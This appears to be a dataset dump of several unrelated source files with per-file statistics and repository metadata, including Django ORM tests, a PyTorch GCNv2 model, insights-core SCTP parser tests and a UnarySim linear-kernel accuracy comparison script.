style = PoolStyle.objects.prefetch_related('pool').get(pk=1)
pool = style.pool
self.assertIs(style, pool.poolstyle)
def test_one_to_one_multi_prefetch_related(self):
with self.assertNumQueries(2):
poolstyles = list(PoolStyle.objects.prefetch_related('pool').order_by('pk'))
self.assertIs(poolstyles[0], poolstyles[0].pool.poolstyle)
self.assertIs(poolstyles[1], poolstyles[1].pool.poolstyle)
def test_reverse_one_to_one(self):
with self.assertNumQueries(2):
pool = Pool.objects.get(pk=2)
style = pool.poolstyle
self.assertIs(pool, style.pool)
def test_reverse_one_to_one_select_related(self):
with self.assertNumQueries(1):
pool = Pool.objects.select_related('poolstyle').get(pk=2)
style = pool.poolstyle
self.assertIs(pool, style.pool)
def test_reverse_one_to_one_prefetch_related(self):
with self.assertNumQueries(2):
pool = Pool.objects.prefetch_related('poolstyle').get(pk=2)
style = pool.poolstyle
self.assertIs(pool, style.pool)
def test_reverse_one_to_one_multi_select_related(self):
with self.assertNumQueries(1):
pools = list(Pool.objects.select_related('poolstyle').order_by('pk'))
self.assertIs(pools[1], pools[1].poolstyle.pool)
self.assertIs(pools[2], pools[2].poolstyle.pool)
def test_reverse_one_to_one_multi_prefetch_related(self):
with self.assertNumQueries(2):
pools = list(Pool.objects.prefetch_related('poolstyle').order_by('pk'))
self.assertIs(pools[1], pools[1].poolstyle.pool)
self.assertIs(pools[2], pools[2].poolstyle.pool)
| 44.751938
| 94
| 0.661181
| 708
| 5,773
| 5.201977
| 0.103107
| 0.071681
| 0.117296
| 0.098832
| 0.866685
| 0.790117
| 0.750747
| 0.728211
| 0.654358
| 0.654358
| 0
| 0.019088
| 0.228651
| 5,773
| 128
| 95
| 45.101563
| 0.807995
| 0.015417
| 0
| 0.59434
| 0
| 0
| 0.01637
| 0
| 0
| 0
| 0
| 0
| 0.40566
| 1
| 0.160377
| false
| 0
| 0.028302
| 0
| 0.207547
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d2bd9b7517c25773193da8e58ce61b08f3cbc0b4
| 3,474
|
py
|
Python
|
models/arch.py
|
XiaoSong9905/GCNv2
|
1fc370fbc4cebafa7aed141e68b063092e88d6d2
|
[
"Apache-2.0"
] | 2
|
2022-03-29T05:18:21.000Z
|
2022-03-29T05:18:23.000Z
|
models/arch.py
|
XiaoSong9905/GCNv2
|
1fc370fbc4cebafa7aed141e68b063092e88d6d2
|
[
"Apache-2.0"
] | null | null | null |
models/arch.py
|
XiaoSong9905/GCNv2
|
1fc370fbc4cebafa7aed141e68b063092e88d6d2
|
[
"Apache-2.0"
] | null | null | null |
import torch
class GCNv2(torch.nn.Module):
def __init__(self):
super(GCNv2, self).__init__()
self.elu = torch.nn.ELU(inplace=True)
self.conv1 = torch.nn.Conv2d(1, 32, kernel_size=4, stride=2, padding=1)
self.conv2 = torch.nn.Conv2d(32, 64, kernel_size=4, stride=2, padding=1)
self.conv3_1 = torch.nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1)
self.conv3_2 = torch.nn.Conv2d(128, 128, kernel_size=4, stride=2, padding=1)
self.conv4_1 = torch.nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)
self.conv4_2 = torch.nn.Conv2d(256, 256, kernel_size=4, stride=2, padding=1)
# Descriptor
self.convF_1 = torch.nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
self.convF_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
# Detector
self.convD_1 = torch.nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
self.convD_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
self.pixel_shuffle = torch.nn.PixelShuffle(16)
def forward(self, x):
x = self.elu(self.conv1(x))
x = self.elu(self.conv2(x))
x = self.elu(self.conv3_1(x))
x = self.elu(self.conv3_2(x))
x = self.elu(self.conv4_1(x))
x = self.elu(self.conv4_2(x))
# Descriptor xF
xF = self.elu(self.convF_1(x))
desc = self.convF_2(xF)
dn = torch.norm(desc, p=2, dim=1) # Compute the norm.
desc = desc.div(torch.unsqueeze(dn, 1)) # Divide by norm to normalize.
# Detector xD
xD = self.elu(self.convD_1(x))
det = self.convD_2(xD).sigmoid()
det = self.pixel_shuffle(det)
return desc, det
class GCNv2_tiny(torch.nn.Module):
def __init__(self):
super(GCNv2_tiny, self).__init__()
self.elu = torch.nn.ELU(inplace=True)
self.conv1 = torch.nn.Conv2d(1, 32, kernel_size=4, stride=2, padding=1)
self.conv2 = torch.nn.Conv2d(32, 32, kernel_size=4, stride=2, padding=1)
self.conv3_1 = torch.nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1)
self.conv3_2 = torch.nn.Conv2d(64, 64, kernel_size=4, stride=2, padding=1)
self.conv4_1 = torch.nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1)
self.conv4_2 = torch.nn.Conv2d(128, 128, kernel_size=4, stride=2, padding=1)
# Descriptor
self.convF_1 = torch.nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)
self.convF_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
self.convD_1 = torch.nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)
self.convD_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
self.pixel_shuffle = torch.nn.PixelShuffle(16)
def forward(self, x):
x = self.elu(self.conv1(x))
x = self.elu(self.conv2(x))
x = self.elu(self.conv3_1(x))
x = self.elu(self.conv3_2(x))
x = self.elu(self.conv4_1(x))
x = self.elu(self.conv4_2(x))
# Descriptor xF
xF = self.elu(self.convF_1(x))
desc = self.convF_2(xF)
dn = torch.norm(desc, p=2, dim=1) # Compute the norm.
desc = desc.div(torch.unsqueeze(dn, 1)) # Divide by norm to normalize.
# Detector xD
xD = self.elu(self.convD_1(x))
det = self.convD_2(xD).sigmoid()
det = self.pixel_shuffle(det)
return desc, det
| 36.568421
| 84
| 0.613414
| 563
| 3,474
| 3.653641
| 0.106572
| 0.088478
| 0.126398
| 0.052504
| 0.976179
| 0.976179
| 0.969373
| 0.967428
| 0.931454
| 0.928537
| 0
| 0.096067
| 0.238918
| 3,474
| 95
| 85
| 36.568421
| 0.681921
| 0.050662
| 0
| 0.688525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0
| 0.016393
| 0
| 0.147541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
96087549b88cdcd0833a914b38e0be492f5d08d1
| 330
|
py
|
Python
|
cc-sdk-mini/CloudConformity/ExternalID.py
|
zachwhaley/thus
|
22b006c4ea110fbdc09a79c38e49e79ba04bb4d4
|
[
"MIT"
] | 24
|
2020-09-10T18:34:04.000Z
|
2022-02-09T01:52:20.000Z
|
cc-sdk-mini/CloudConformity/ExternalID.py
|
zachwhaley/thus
|
22b006c4ea110fbdc09a79c38e49e79ba04bb4d4
|
[
"MIT"
] | 5
|
2020-09-11T17:22:08.000Z
|
2021-09-08T15:51:58.000Z
|
cc-sdk-mini/CloudConformity/ExternalID.py
|
zachwhaley/thus
|
22b006c4ea110fbdc09a79c38e49e79ba04bb4d4
|
[
"MIT"
] | 6
|
2020-09-10T20:03:00.000Z
|
2021-06-25T07:33:21.000Z
|
class ExternalID:
def __init__(self, config, connection):
self._config = config
self._connection = connection
def get(self):
return self._connection.get(url='/organisation/external-id')
def create(self, data):
return self._connection.post(url='/organisation/external-id', payload=None)
| 36.666667
| 83
| 0.681818
| 38
| 330
| 5.710526
| 0.473684
| 0.193548
| 0.184332
| 0.230415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 330
| 9
| 83
| 36.666667
| 0.82197
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0
| 0.25
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
9614eee6cc72ee6204c436cbb0e5ee40d29f402a
| 8,035
|
py
|
Python
|
insights/parsers/tests/test_sctp.py
|
smalleni/insights-core
|
3961d400f032b2b1ed66665813ebe5220f27c62d
|
[
"Apache-2.0"
] | null | null | null |
insights/parsers/tests/test_sctp.py
|
smalleni/insights-core
|
3961d400f032b2b1ed66665813ebe5220f27c62d
|
[
"Apache-2.0"
] | null | null | null |
insights/parsers/tests/test_sctp.py
|
smalleni/insights-core
|
3961d400f032b2b1ed66665813ebe5220f27c62d
|
[
"Apache-2.0"
] | null | null | null |
import doctest
import pytest
from insights.parsers import ParseException, SkipException
from insights.parsers import sctp
from insights.parsers.sctp import SCTPEps
from insights.parsers.sctp import SCTPAsc
from insights.tests import context_wrap
SCTP_EPS_DETAILS = """
ENDPT SOCK STY SST HBKT LPORT UID INODE LADDRS
ffff88017e0a0200 ffff880299f7fa00 2 10 29 11165 200 299689357 10.0.0.102 10.0.0.70
ffff880612e81c00 ffff8803c28a1b00 2 10 30 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2
ffff88061fba9800 ffff88061f8a3180 2 10 31 11167 200 273361145 10.0.0.102 10.0.0.70
ffff88031e6f1a00 ffff88031dbdb180 2 10 32 11168 200 273365974 10.0.0.102 10.0.0.70 192.168.11.2
""".strip()
SCTP_EPS_DETAILS_NO = """
ENDPT SOCK STY SST LPORT UID INODE LADDRS
ffff88017e0a0200 ffff880299f7fa00 2 10 11165 200 299689357 10.0.0.102 10.0.0.70
ffff880612e81c00 ffff8803c28a1b00 2 10 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2
ffff88061fba9800 ffff88061f8a3180 2 10 11167 200 273361145 10.0.0.102 10.0.0.70
ffff88031e6f1a00 ffff88031dbdb180 2 10 11168 200 273365974 10.0.0.102 10.0.0.70 192.168.11.2
""".strip()
SCTP_EPS_DETAILS_DOC = """
ENDPT SOCK STY SST HBKT LPORT UID INODE LADDRS
ffff88017e0a0200 ffff880299f7fa00 2 10 29 11165 200 299689357 10.0.0.102 10.0.0.70
ffff880612e81c00 ffff8803c28a1b00 2 10 30 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2
""".strip()
SCTP_EPS_DETAILS_NO_2 = """
""".strip()
SCTP_ASSOC = """
ASSOC SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS <-> RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff88045ac7e000 ffff88062077aa00 2 1 4 1205 963 0 0 200 273361167 11567 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff88061fbf2000 ffff88060ff92500 2 1 4 1460 942 0 0 200 273360669 11566 11167 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff8803217b9000 ffff8801c6321580 2 1 4 1675 977 0 0 200 273361369 11565 11168 10.0.0.102 10.0.0.70 192.168.11.2 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff8803db908000 ffff88061e4a00c0 2 1 4 2229 967 0 0 200 273361177 12067 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.110 10.0.0.78 1000 2 2 10 0 0 0
ffff88062258f000 ffff88060fffaa40 2 1 4 2485 953 0 0 200 273360681 12066 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.103 10.0.0.71 1000 2 2 10 0 0 0
ffff8801ce686000 ffff8801c7083ac0 2 1 4 2741 982 0 0 200 273361381 12065 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.112 10.0.0.80 1000 2 2 10 0 0 0
ffff88031e1f4000 ffff8801c6fd9b00 2 1 4 7092 1005 0 0 200 273366011 11567 11167 10.0.0.102 10.0.0.70 <-> *10.0.0.111 10.0.0.79 1000 2 2 10 0 0 0
""".strip()
SCTP_ASSOC_2 = """
ASSOC SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS <-> RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff8804239ca000 ffff8804238c6040 2 1 4 3091 1 0 0 500 90293 37379 3868 10.0.200.114 10.0.201.114 2010:0010:0000:0200:0000:0000:0000:0114 2010:0010:0000:0201:0000:0000:0000:0114 <-> *10.0.100.94 10.0.101.94 2010:0010:0000:0100:0000:0000:0000:0094 2010:0010:0000:0101:0000:0000:0000:0094 1000 5 5 10 0 0 0
""".strip()
SCTP_ASSOC_DOC = """
ASSOC SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS <-> RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff88045ac7e000 ffff88062077aa00 2 1 4 1205 963 0 0 200 273361167 11567 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff88061fbf2000 ffff88060ff92500 2 1 4 1460 942 0 0 200 273360669 11566 11167 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
""".strip()
SCTP_ASSOC_NO = """
""".strip()
SCTP_ASSOC_NO_2 = """
SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff88045ac7e000 ffff88062077aa00 2 1 4 1205 963 0 0 200 273361167 11567 11166 10.0.0.102 10.0.0.70 *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
""".strip()
def test_sctp_eps():
sctp_info = SCTPEps(context_wrap(SCTP_EPS_DETAILS))
assert sorted(sctp_info.sctp_local_ports) == sorted(['11165', '11166', '11167', '11168'])
assert sorted(sctp_info.sctp_local_ips) == sorted(['10.0.0.102', '10.0.0.70', '172.31.1.2', '192.168.11.2'])
assert sctp_info.sctp_eps_ips == {'ffff88017e0a0200': ['10.0.0.102', '10.0.0.70'],
'ffff880612e81c00': ['10.0.0.102', '10.0.0.70', '172.31.1.2'],
'ffff88061fba9800': ['10.0.0.102', '10.0.0.70'],
'ffff88031e6f1a00': ['10.0.0.102', '10.0.0.70', '192.168.11.2']}
assert len(sctp_info.search(local_port='11165')) == 1
def test_sctp_asc():
sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC))
assert sorted(sctp_asc.sctp_local_ports) == sorted(['11567', '11566', '11565', '12067', '12065', '12066'])
assert sorted(sctp_asc.search(local_port='11565')) == sorted([{'init_chunks_send': '0', 'uid': '200', 'shutdown_chunks_send': '0', 'max_outstream': '2', 'tx_que': '0', 'inode': '273361369', 'hrtbt_intrvl': '1000', 'sk_type': '2', 'remote_addr': ['*10.0.0.109', '10.0.0.77'], 'data_chunks_retrans': '0', 'local_addr': ['10.0.0.102', '10.0.0.70', '192.168.11.2'], 'asc_id': '977', 'max_instream': '2', 'remote_port': '11168', 'asc_state': '4', 'max_retrans_atmpt': '10', 'sk_state': '1', 'socket': 'ffff8801c6321580', 'asc_struct': 'ffff8803217b9000', 'local_port': '11565', 'hash_bkt': '1675', 'rx_que': '0'}])
assert len(sctp_asc.search(local_port='11567')) == 2
assert sorted(sctp_asc.sctp_local_ips) == sorted(['10.0.0.102', '10.0.0.70', '192.168.11.2'])
assert sorted(sctp_asc.sctp_remote_ips) == sorted(['*10.0.0.109', '10.0.0.77', '*10.0.0.110', '10.0.0.78', '*10.0.0.103', '10.0.0.71', '*10.0.0.112', '10.0.0.80', '*10.0.0.111', '10.0.0.79'])
sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC_2))
assert sorted(sctp_asc.sctp_local_ips) == sorted(['10.0.200.114', '10.0.201.114', '2010:0010:0000:0200:0000:0000:0000:0114', '2010:0010:0000:0201:0000:0000:0000:0114'])
assert sorted(sctp_asc.sctp_remote_ips) == sorted(['*10.0.100.94', '10.0.101.94', '2010:0010:0000:0100:0000:0000:0000:0094', '2010:0010:0000:0101:0000:0000:0000:0094'])
def test_sctp_eps_exceptions():
with pytest.raises(ParseException) as exc:
sctp_obj = SCTPEps(context_wrap(SCTP_EPS_DETAILS_NO))
assert sctp_obj is None # Just added to remove flake8 warnings
assert 'Contents are not compatible to this parser' in str(exc)
with pytest.raises(SkipException) as exc:
sctp_obj = SCTPEps(context_wrap(SCTP_EPS_DETAILS_NO_2))
assert sctp_obj is None # Just added to remove flake8 warnings
assert 'No Contents' in str(exc)
def test_sctp_asc_exceptions():
with pytest.raises(ParseException) as exc:
sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC_NO_2))
assert sctp_asc is None
assert 'Contents are not compatible to this parser' in str(exc)
with pytest.raises(SkipException) as exc:
sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC_NO))
assert sctp_asc is None
assert 'No Contents' in str(exc)
def test_sctp_doc_examples():
env = {
'sctp_info': SCTPEps(context_wrap(SCTP_EPS_DETAILS_DOC)),
'sctp_asc': SCTPAsc(context_wrap(SCTP_ASSOC_DOC))
}
failed, total = doctest.testmod(sctp, globs=env)
assert failed == 0
| 66.958333
| 613
| 0.634101
| 1,350
| 8,035
| 3.66963
| 0.156296
| 0.048042
| 0.078321
| 0.038151
| 0.768268
| 0.739201
| 0.711344
| 0.680258
| 0.614655
| 0.590028
| 0
| 0.369905
| 0.23659
| 8,035
| 119
| 614
| 67.521008
| 0.437724
| 0.009085
| 0
| 0.350515
| 0
| 0.257732
| 0.643171
| 0.039201
| 0
| 0
| 0
| 0
| 0.206186
| 1
| 0.051546
| false
| 0
| 0.072165
| 0
| 0.123711
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
828d4307e5b45d45f0239b1049b64ef15e2663f6
| 7,668
|
py
|
Python
|
test/kernel/test_kernel_linear_fxp_hub_compare.py
|
jingjieli95/UnarySim
|
775b38fa2d6b05a69fd73acb4766e50200a5cc37
|
[
"MIT"
] | 17
|
2020-04-26T19:38:03.000Z
|
2022-02-23T02:05:08.000Z
|
test/kernel/test_kernel_linear_fxp_hub_compare.py
|
jingjieli95/UnarySim
|
775b38fa2d6b05a69fd73acb4766e50200a5cc37
|
[
"MIT"
] | 3
|
2021-11-03T18:20:29.000Z
|
2022-02-11T16:30:16.000Z
|
test/kernel/test_kernel_linear_fxp_hub_compare.py
|
jingjieli95/UnarySim
|
775b38fa2d6b05a69fd73acb4766e50200a5cc37
|
[
"MIT"
] | 9
|
2019-12-03T05:08:55.000Z
|
2022-01-04T20:24:55.000Z
|
# %%
import torch
from UnarySim.kernel.linear import *
import matplotlib.pyplot as plt
import time
import math
import numpy as np
# %%
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# %%
def test(rounding = "round", abs_err = True):
ufc_err_min_list = []
ufc_err_max_list = []
ufc_err_mean_list = []
ufc_err_std_list = []
ofc_err_min_list = []
ofc_err_max_list = []
ofc_err_mean_list = []
ofc_err_std_list = []
ifc_err_min_list = []
ifc_err_max_list = []
ifc_err_mean_list = []
ifc_err_std_list = []
x_label = []
for bitwidth in range(6, 13):
cycle = 2**(bitwidth-1)
in_feature = 2
out_feature = 2**12
bias = False
input = torch.cat(2*[(torch.arange(0, out_feature)/out_feature - 0.5).unsqueeze(1)], 1).to(device)
input[:, 1] = 0.
fc = torch.nn.Linear(in_feature, out_feature, bias=bias).to(device)
fc.weight.data = torch.cat(2*[(torch.arange(0, out_feature)/out_feature - 0.5).unsqueeze(1)], 1).to(device)
fc.weight.data[:, 1] = 0.
fc_o = fc(input)
ufc = HUBLinear(in_feature, out_feature, bias=bias, binary_weight=fc.weight.data, binary_bias=fc.bias, cycle=cycle, rounding=rounding).to(device)
ufc_o = ufc(input)
ofc = FxpLinear(in_feature, out_feature, bias=bias, binary_weight=fc.weight.data, binary_bias=fc.bias, bitwidth=bitwidth, keep_res="output", more_res="input", rounding=rounding).to(device)
ofc_o = ofc(input)
ifc = FxpLinear(in_feature, out_feature, bias=bias, binary_weight=fc.weight.data, binary_bias=fc.bias, bitwidth=bitwidth, keep_res="input", more_res="input", rounding=rounding).to(device)
ifc_o = ifc(input)
if abs_err is True:
ufc_err = (ufc_o - fc_o)
ofc_err = (ofc_o - fc_o)
ifc_err = (ifc_o - fc_o)
else:
ufc_err = (ufc_o - fc_o) / fc_o
ofc_err = (ofc_o - fc_o) / fc_o
ifc_err = (ifc_o - fc_o) / fc_o
ufc_err_min_list.append(np.nanmin(ufc_err.cpu().detach().numpy()))
ufc_err_max_list.append(np.nanmax(ufc_err.cpu().detach().numpy()))
ufc_err_mean_list.append(np.nanmean(np.abs(ufc_err.cpu().detach().numpy())))
ufc_err_std_list.append(np.nanstd(ufc_err.cpu().detach().numpy()))
ofc_err_min_list.append(np.nanmin(ofc_err.cpu().detach().numpy()))
ofc_err_max_list.append(np.nanmax(ofc_err.cpu().detach().numpy()))
ofc_err_mean_list.append(np.nanmean(np.abs(ofc_err.cpu().detach().numpy())))
ofc_err_std_list.append(np.nanstd(ofc_err.cpu().detach().numpy()))
ifc_err_min_list.append(np.nanmin(ifc_err.cpu().detach().numpy()))
ifc_err_max_list.append(np.nanmax(ifc_err.cpu().detach().numpy()))
ifc_err_mean_list.append(np.nanmean(np.abs(ifc_err.cpu().detach().numpy())))
ifc_err_std_list.append(np.nanstd(ifc_err.cpu().detach().numpy()))
x_label.append(2**(bitwidth-1))
return ufc_err_min_list, ufc_err_max_list, ufc_err_mean_list, ufc_err_std_list, ofc_err_min_list, ofc_err_max_list, ofc_err_mean_list, ofc_err_std_list, ifc_err_min_list, ifc_err_max_list, ifc_err_mean_list, ifc_err_std_list, x_label
# %%
rounding = "round"
abs_err = True
ufc_err_min_list, ufc_err_max_list, ufc_err_mean_list, ufc_err_std_list, ofc_err_min_list, ofc_err_max_list, ofc_err_mean_list, ofc_err_std_list, ifc_err_min_list, ifc_err_max_list, ifc_err_mean_list, ifc_err_std_list, x_label = test(rounding, abs_err)
print(ufc_err_mean_list)
print(ufc_err_std_list)
print()
print(ofc_err_mean_list)
print(ofc_err_std_list)
print()
print(ifc_err_mean_list)
print(ifc_err_std_list)
print()
print(x_label)
# %%
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
font = {'family':'Times New Roman', 'size': 6}
matplotlib.rc('font', **font)
my_dpi = 300
fig_h = 1
fig_w = 3.3115
# construct some data like what you have:
x = np.array([i for i in range(len(ufc_err_mean_list))])
means1 = np.array(ufc_err_mean_list)
stds1 = np.array(ufc_err_std_list)
mins1 = np.array(ufc_err_min_list)
maxs1 = np.array(ufc_err_max_list)
means2 = np.array(ofc_err_mean_list)
stds2 = np.array(ofc_err_std_list)
mins2 = np.array(ofc_err_min_list)
maxs2 = np.array(ofc_err_max_list)
means3 = np.array(ifc_err_mean_list)
stds3 = np.array(ifc_err_std_list)
mins3 = np.array(ifc_err_min_list)
maxs3 = np.array(ifc_err_max_list)
x_label = ['6-32', '7-64', '8-128', '9-256', '10-512', '11-1024', '12-2048']
width = 0.20
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
ax.plot(x, means1, "-o", label="uSystolic", color="#7A81FF", ms=4)
ax.fill_between(x, means1-stds1, means1+stds1, alpha=0.3, color="#7A81FF", edgecolor=None)
ax.plot(x, means2, "-s", label="FXP-o-res", color="#FF7F7F", ms=4)
ax.fill_between(x, means2-stds2, means2+stds2, alpha=0.3, color="#FF7F7F", edgecolor=None)
ax.plot(x, means3, "-^", label="FXP-i-res", color="#D783FF", ms=4)
ax.fill_between(x, means3-stds3, means3+stds3, alpha=0.3, color="#D783FF", edgecolor=None)
ax.set_xticks(x)
ax.set_xticklabels(x_label)
ax.set_yscale('linear')
ax.set_yticks([0, 0.01, 0.02])
ax.set_yticklabels(["0.00", "0.01", "0.02"])
ax.legend(loc="upper right", ncol=3, frameon=False)
fig.tight_layout()
plt.show()
fig.savefig("test_kernel_linear_fxp_hub_compare_abs_err.pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
# %%
rounding = "round"
abs_err = False
ufc_err_min_list, ufc_err_max_list, ufc_err_mean_list, ufc_err_std_list, ofc_err_min_list, ofc_err_max_list, ofc_err_mean_list, ofc_err_std_list, ifc_err_min_list, ifc_err_max_list, ifc_err_mean_list, ifc_err_std_list, x_label = test(rounding, abs_err)
print(ufc_err_mean_list)
print(ufc_err_std_list)
print()
print(ofc_err_mean_list)
print(ofc_err_std_list)
print()
print(ifc_err_mean_list)
print(ifc_err_std_list)
print()
print(x_label)
# %%
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
font = {'family':'Times New Roman', 'size': 6}
matplotlib.rc('font', **font)
my_dpi = 300
fig_h = 1
fig_w = 3.3115
# construct some data like what you have:
x = np.array([i for i in range(len(ufc_err_mean_list))])
means1 = np.array(ufc_err_mean_list)
stds1 = np.array(ufc_err_std_list)
mins1 = np.array(ufc_err_min_list)
maxs1 = np.array(ufc_err_max_list)
means2 = np.array(ofc_err_mean_list)
stds2 = np.array(ofc_err_std_list)
mins2 = np.array(ofc_err_min_list)
maxs2 = np.array(ofc_err_max_list)
means3 = np.array(ifc_err_mean_list)
stds3 = np.array(ifc_err_std_list)
mins3 = np.array(ifc_err_min_list)
maxs3 = np.array(ifc_err_max_list)
x_label = ['6-32', '7-64', '8-128', '9-256', '10-512', '11-1024', '12-2048']
width = 0.20
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
ax.plot(x, means1, "-o", label="uSystolic", color="#7A81FF", ms=4)
ax.fill_between(x, means1-stds1, means1+stds1, alpha=0.3, color="#7A81FF", edgecolor=None)
ax.plot(x, means2, "-s", label="FXP-o-res", color="#FF7F7F", ms=4)
ax.fill_between(x, means2-stds2, means2+stds2, alpha=0.3, color="#FF7F7F", edgecolor=None)
ax.plot(x, means3, "-^", label="FXP-i-res", color="#D783FF", ms=4)
ax.fill_between(x, means3-stds3, means3+stds3, alpha=0.3, color="#D783FF", edgecolor=None)
ax.set_xticks(x)
ax.set_xticklabels(x_label)
ax.set_yscale('linear')
ax.set_yticks([0, 0.4, 0.8])
ax.set_yticklabels(["0.00", "0.40", "0.80"])
# ax.legend(loc="upper right", ncol=3, frameon=False)
fig.tight_layout()
plt.show()
fig.savefig("test_kernel_linear_fxp_hub_compare_rel_err.pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
# %%
| 33.051724
| 252
| 0.69614
| 1,328
| 7,668
| 3.70256
| 0.131777
| 0.04881
| 0.064877
| 0.041489
| 0.914379
| 0.899939
| 0.826927
| 0.766524
| 0.74761
| 0.734798
| 0
| 0.039492
| 0.148018
| 7,668
| 231
| 253
| 33.194805
| 0.713149
| 0.020214
| 0
| 0.588957
| 0
| 0
| 0.063725
| 0.012265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006135
| false
| 0
| 0.07362
| 0
| 0.08589
| 0.122699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
829b1c227b83ecabfae2994759613995e47d79a5
| 83
|
py
|
Python
|
tests/test_sampleMangler.py
|
cowanml/samplemangler
|
cd2b772beb74cf5d2106cd67e74e95ebafc74735
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_sampleMangler.py
|
cowanml/samplemangler
|
cd2b772beb74cf5d2106cd67e74e95ebafc74735
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_sampleMangler.py
|
cowanml/samplemangler
|
cd2b772beb74cf5d2106cd67e74e95ebafc74735
|
[
"BSD-3-Clause"
] | null | null | null |
from sampleMangler.__main__ import main
def test_main():
assert main([]) == 0
| 16.6
| 39
| 0.698795
| 11
| 83
| 4.818182
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0.180723
| 83
| 4
| 40
| 20.75
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
82b441794f9e72c5af1f92de572a2106ef9043ce
| 206
|
py
|
Python
|
src/isaw.facultycv/isaw/facultycv/interfaces/peopleview.py
|
isawnyu/isaw.web
|
